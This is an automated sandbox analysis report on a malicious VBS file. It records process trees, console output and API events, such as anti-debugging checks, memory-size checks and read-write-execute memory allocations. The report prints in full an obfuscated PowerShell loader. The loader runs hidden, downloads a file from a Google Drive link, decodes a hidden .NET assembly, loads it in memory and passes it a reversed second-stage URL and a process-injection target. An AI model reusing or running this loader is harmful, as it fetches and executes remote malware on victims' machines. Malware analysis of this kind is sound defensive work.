Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 22, 2024, 9:52 a.m.	Oct. 22, 2024, 9:54 a.m.

Size	192.5KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5	`50b077ebb8d0ec5ccfa4c82bc511f5d6`
SHA256	`92093331155feed076959cf7422498f3c23e312c65936aae1693e14be0a713da`
CRC32	`F8A1DE7B`
ssdeep	`3072:ha2yinjjKOnqs6SUXA4gt5pzGweXkQ7Cr5NOiup0OPWNGJRlcX:haFyyOx6SpnU0UFRlcX`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\FORGREECEEEOOOOMPDW-constraints.vbs
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd6VjRpbWFnZVVybCA9IE9MQ2h0dHBzOi8vZHInKydpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MS0nKydXZGdlcTBmWDknKydhQXBkbFNXOWRsbjFQY19LRUdwZkhwIE9MQzt6VjR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3pWNGltYWdlQnl0ZXMgPSB6VjR3ZWJDbGllbnQuRG93bmxvYWREYXRhKHpWNGltYWdlVXJsKTt6VjRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFMnKyd0cmluZyh6VjRpbWFnZUJ5dCcrJ2VzKTt6VjRzdGFydEZsYWcgPSBPTEM8PEJBU0U2NF9TVEFSVCcrJz4+T0xDO3pWNGVuJysnZEZsYWcgPSBPTEM8PEJBU0U2NF9FTkQ+Pk9MQzt6VjRzdGFydEluZGV4ID0gelY0aW1hZ2VUZXh0LkluZGV4T2YoelY0c3RhcnRGbGFnKTt6VjRlbmRJbmRleCA9IHpWNGltYWdlVGV4dC5JbmRleE9mKHpWNGVuZEYnKydsYWcpO3pWNHN0YXJ0SW5kZXggLWdlIDAgLWFuZCB6VjRlbmRJbmRleCAtZ3QgelY0c3RhcnRJbmRleDt6VjRzJysndGFydEluZGV4ICs9IHpWNHN0YXJ0RmxhZy5MZW5ndGg7elY0YmFzZTY0TGVuZ3RoICcrJz0gelY0ZW5kSW5kZXggLSB6VjRzdGFydEluZGV4O3pWNGJhc2U2NENvbW1hbmQgPSB6VjRpbWFnZVRleHQuU3Vic3RyaW5nKHpWNHN0YXJ0JysnSW5kZXgsIHpWNGJhc2U2NExlbmcnKyd0aCk7elY0YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoelY0YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGtSaSBGb3JFYWNoLU9iamVjdCB7IHpWNF8gfSlbLTEuLi0oelY0YicrJ2FzZTY0Q29tbWFuZC5MZW5ndGgpXTt6VjRjb21tYW5kQnl0ZXMgPSBbU3lzdGUnKydtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHpWNGJhc2U2NFJldmVyc2VkKTt6VjRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoelY0Y29tbScrJ2FuZEJ5dGVzKTt6VjR2YWlNZXRob2QgPSBbZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKCcrJ09MQ1ZBSU9MQyk7elY0dmFpTWV0aG9kLkludm9rZSh6VjRudWxsLCBAKE9MQ3R4dC45Njg1Nzh0dHR0dHRzZXRhbGRpb3JkL2dyby5zbmRrY3VkLmUnKydlZWNlZXJnc2J2eXl5eWFkbicrJ29tLy86cHR0aE9MQywgT0xDZGVzYXRpdmFkb09MQywgT0xDZGVzYXRpdmFkb09MQywnKycgT0xDZGVzYXRpdmFkb09MQywgT0wnKydDQWRkSW5Qcm9jZXNzMzJPTEMsIE9MQ2Rlc2F0aXZhZCcrJ29PTEMsIE9MQ2Rlc2F0aXZhZG9PTEMsT0xDZGVzYXQnKydpdmFkb09MQyxPTENkZXNhdGl2YWRvT0xDLE9MQ2Rlc2F0aXZhZG9PTCcrJ0MsT0xDZGVzYXRpdmFkb09MJysnQyxPTENkZXNhdGl2YWRvT0xDLE9MQzFPTEMpKTsnKS5yRVBsYWNFKCd6VjQnLCckJykuckVQbGFjRSgoW0NoQVJdMTA3K1tDaEFSXTgyK1tDaEFSXTEwNSksJ3wnKS5yRVBsYWNFKCdPTEMnLFtTdHJpbkddW0NoQVJdMzkpfCAuICggJGVuVjpDb01TcGVjWzQsMjQsMjVdLWpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2640
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('zV4imageUrl = OLChttps://dr'+'ive.'+'google.com/uc?export=download&id=1-'+'Wdgeq0fX9'+'aApdlSW9dln1Pc_KEGpfHp OLC;zV4webClient = New-Object System.Net.WebClient;zV4imageBytes = zV4webClient.DownloadData(zV4imageUrl);zV4imageText = [System.Text.Encoding]::UTF8.GetS'+'tring(zV4imageByt'+'es);zV4startFlag = OLC<<BASE64_START'+'>>OLC;zV4en'+'dFlag = OLC<<BASE64_END>>OLC;zV4startIndex = zV4imageText.IndexOf(zV4startFlag);zV4endIndex = zV4imageText.IndexOf(zV4endF'+'lag);zV4startIndex -ge 0 -and zV4endIndex -gt zV4startIndex;zV4s'+'tartIndex += zV4startFlag.Length;zV4base64Length '+'= zV4endIndex - zV4startIndex;zV4base64Command = zV4imageText.Substring(zV4start'+'Index, zV4base64Leng'+'th);zV4base64Reversed = -join (zV4base64Command.ToCharArray() kRi ForEach-Object { zV4_ })[-1..-(zV4b'+'ase64Command.Length)];zV4commandBytes = [Syste'+'m.Convert]::FromBase64String(zV4base64Reversed);zV4loadedAssembly = [System.Reflection.Assembly]::Load(zV4comm'+'andBytes);zV4vaiMethod = [dn'+'lib.IO.Home].GetMethod('+'OLCVAIOLC);zV4vaiMethod.Invoke(zV4null, @(OLCtxt.968578ttttttsetaldiord/gro.sndkcud.e'+'eeceergsbvyyyyadn'+'om//:ptthOLC, OLCdesativadoOLC, OLCdesativadoOLC,'+' OLCdesativadoOLC, OL'+'CAddInProcess32OLC, OLCdesativad'+'oOLC, OLCdesativadoOLC,OLCdesat'+'ivadoOLC,OLCdesativadoOLC,OLCdesativadoOL'+'C,OLCdesativadoOL'+'C,OLCdesativadoOLC,OLC1OLC));').rEPlacE('zV4','$').rEPlacE(([ChAR]107+[ChAR]82+[ChAR]105),'|').rEPlacE('OLC',[StrinG][ChAR]39)| . ( $enV:CoMSpec[4,24,25]-join'')"
    2788

Name	Response	Post-Analysis Lookup
drive.google.com		142.250.76.142

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 22, 2024, 9:52 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 22, 2024, 9:52 a.m.			0	0
IsDebuggerPresent Oct. 22, 2024, 9:52 a.m.			0	0

Command line console output was observed (50 out of 184 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n console_handle: 0x00000023	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ot be resolved: 'drive.google.com'" console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: At line:1 char:179 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + $imageUrl = 'https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlS console_handle: 0x00000047	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: W9dln1Pc_KEGpfHp ';$webClient = New-Object System.Net.WebClient;$imageBytes = $ console_handle: 0x00000053	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UT console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: F8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_ console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.Inde console_handle: 0x00000077	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: xOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $ console_handle: 0x00000083	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imag console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: eText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Com console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: mand.ToCharArray() \| ForEach-Object { $_ })[-1..-($base64Command.Length)];$comm console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: andBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.968578ttttttsetaldiord/gro.s console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ndkcud.eeeceergsbvyyyyadnom//:ptth', 'desativado', 'desativado', 'desativado', console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: 'AddInProcess32', 'desativado', 'desativado','desativado','desativado','desativ console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ado','desativado','desativado','1')); console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000107	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x00000127	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: Parameter name: bytes" console_handle: 0x00000133	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: At line:1 char:242 console_handle: 0x0000013f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + $imageUrl = 'https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlS console_handle: 0x0000014b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: W9dln1Pc_KEGpfHp ';$webClient = New-Object System.Net.WebClient;$imageBytes = $ console_handle: 0x00000157	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Get console_handle: 0x00000163	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: String <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_ console_handle: 0x0000016f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.Inde console_handle: 0x0000017b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: xOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $ console_handle: 0x00000187	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imag console_handle: 0x00000193	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: eText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Com console_handle: 0x0000019f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: mand.ToCharArray() \| ForEach-Object { $_ })[-1..-($base64Command.Length)];$comm console_handle: 0x000001ab	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: andBytes = [System.Convert]::FromBase64String($base64Reversed);$loadedAssembly console_handle: 0x000001b7	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home console_handle: 0x000001c3	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.968578ttttttsetaldiord/gro.s console_handle: 0x000001cf	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ndkcud.eeeceergsbvyyyyadnom//:ptth', 'desativado', 'desativado', 'desativado', console_handle: 0x000001db	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: 'AddInProcess32', 'desativado', 'desativado','desativado','desativado','desativ console_handle: 0x000001e7	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ado','desativado','desativado','1')); console_handle: 0x000001f3	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001ff	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000020b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000022b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: At line:1 char:348 console_handle: 0x00000237	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: + $imageUrl = 'https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlS console_handle: 0x00000243	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: W9dln1Pc_KEGpfHp ';$webClient = New-Object System.Net.WebClient;$imageBytes = $ console_handle: 0x0000024f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.Get console_handle: 0x0000025b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: String($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>' console_handle: 0x00000267	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: ;$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.Inde console_handle: 0x00000273	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: xOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $ console_handle: 0x0000027f	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imag console_handle: 0x0000028b	1	1
WriteConsoleW Oct. 22, 2024, 9:52 a.m.	buffer: eText.Substring($startIndex, $base64Length);$base64Reversed = -join ($base64Com console_handle: 0x00000297	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecf40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ec240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ecec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c94f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 22, 2024, 9:52 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c9530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 22, 2024, 9:52 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 287 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 22, 2024, 9:52 a.m.	process_identifier: 2640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
